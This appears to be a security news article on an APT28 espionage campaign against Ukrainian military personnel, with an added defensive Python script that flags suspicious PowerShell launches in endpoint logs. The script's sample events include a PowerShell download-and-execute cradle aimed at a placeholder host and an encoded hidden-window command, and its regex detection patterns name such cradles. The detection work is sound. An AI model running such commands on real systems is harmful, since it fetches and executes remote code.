Cybersecurity researchers have discovered a new cyber-espionage campaign targeting Ukrainian military personnel. The operation has been linked to the Russian state-backed hacking group APT28. According to researchers, the attackers are using two malware tools called BEARDSHELL and COVENANT. The campaign is mainly focused on secretly collecting intelligence from compromised systems.


Security experts say the activity was identified by researchers from ESET. Their analysis shows that the campaign has been active since April 2024. The attackers are specifically targeting systems used by Ukrainian military personnel. The main goal appears to be long-term surveillance and information gathering.

APT28 is a well-known cyber-espionage group that has been active for many years. The group is also known by other names such as Fancy Bear, Sednit, and Forest Blizzard. Researchers believe the group is connected to Unit 26165 of Russia’s military intelligence agency (GRU). It has previously targeted governments, defense organizations, and strategic institutions around the world.


According to the research findings, the attackers use a multi-stage attack process. In many cases, the attack starts with social engineering techniques. Victims may receive malicious files that appear to be legitimate documents. Once the file is opened, the hidden malware begins executing in the background.

One of the key tools used in the campaign is BEARDSHELL, a custom backdoor created by the attackers. This malware allows hackers to remotely execute commands on infected systems. It is capable of downloading and running PowerShell commands on compromised machines. The malware communicates with the attackers using cloud-based infrastructure.
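The two paragraphs above describe a chain a defender can watch for on endpoints: a document is opened, hidden code runs, and a backdoor then downloads and executes PowerShell. The following script is an added example written for this page, not code from ESET or from the reported malware. It scores process-creation events (in the shape of Sysmon Event ID 1) for PowerShell launched from a document viewer or from a user-writable path, and for command lines carrying encoded or download-cradle switches. The sample events are constructed, and the heuristics are generic PowerShell-abuse patterns, not indicators taken from the research.

```python
import ntpath
import re

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation).
# These are illustrative records for the example, not telemetry from any real incident.
SAMPLE_EVENTS = [
    {"pid": 4101,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"WINWORD.EXE /n report.docx"},
    {"pid": 4102,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r"powershell.exe -nop -w hidden -enc SQBFAFgA..."},
    {"pid": 4103,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\temp"},
    {"pid": 4104,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\u\AppData\Local\Temp\update.exe",
     "cmdline": "powershell.exe -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://example.invalid/p')\""},
]

# Parents that should rarely spawn a shell: document viewers used in lure delivery.
DOCUMENT_VIEWERS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# A parent binary living in a user-writable directory is typical of a dropped implant.
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public)\\", re.IGNORECASE)

# Command-line traits of scripts that fetch and run further code (generic heuristics).
CMDLINE_PATTERNS = {
    "encoded-command": re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.IGNORECASE),
    "hidden-window": re.compile(r"-(?:w|windowstyle)\s+hidden\b", re.IGNORECASE),
    "download-cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression",
        re.IGNORECASE),
}


def analyze_event(event):
    """Return the list of reasons a single process-creation event looks suspicious."""
    image = ntpath.basename(event["image"]).lower()
    if image not in POWERSHELL_IMAGES:
        return []
    parent = ntpath.basename(event["parent_image"]).lower()
    reasons = []
    if parent in DOCUMENT_VIEWERS:
        reasons.append("office-parent")
    if USER_WRITABLE.search(event["parent_image"]):
        reasons.append("parent-in-user-writable-path")
    for name, pattern in CMDLINE_PATTERNS.items():
        if pattern.search(event["cmdline"]):
            reasons.append(name)
    return reasons


def analyze_events(events):
    """Score every event; 'high' when the parent is anomalous or two or more traits combine."""
    findings = []
    for event in events:
        reasons = analyze_event(event)
        if not reasons:
            continue
        anomalous_parent = any(r in ("office-parent", "parent-in-user-writable-path")
                               for r in reasons)
        severity = "high" if anomalous_parent or len(reasons) >= 2 else "medium"
        findings.append({"pid": event["pid"],
                         "parent": ntpath.basename(event["parent_image"]),
                         "severity": severity,
                         "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(f"pid={finding['pid']} parent={finding['parent']} "
              f"severity={finding['severity']} reasons={','.join(finding['reasons'])}")
```

The benign admin command (PID 4103) produces no finding, while the Word-spawned encoded shell and the Temp-resident parent with a download cradle are both rated high. In production the same logic would run over an EDR or Sysmon feed, and the cloud-hosted command-and-control mentioned in the article means that network-level blocking alone is weak; the process lineage on the endpoint is the more reliable signal.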


The attackers also use another tool called COVENANT, which is an open-source .NET post-exploitation framework. After the initial compromise, this tool helps attackers maintain control over the system. It allows them to move within the network and collect additional information. This makes it easier for the attackers to continue their surveillance activities.

Researchers also discovered another component used in the operation called SLIMAGENT. This program is designed to gather detailed information from infected systems. It can record keystrokes, capture screenshots, and monitor clipboard activity. These capabilities allow attackers to observe user behavior and collect sensitive data.


Security experts say the campaign shows the advanced capabilities of modern cyber-espionage groups. By combining custom malware with legitimate tools, attackers can hide their activity more effectively. The use of cloud services also helps them blend in with normal network traffic. Researchers warn that organizations related to defense and government should remain alert to such advanced threats.

Stay alert, and keep your security measures updated!
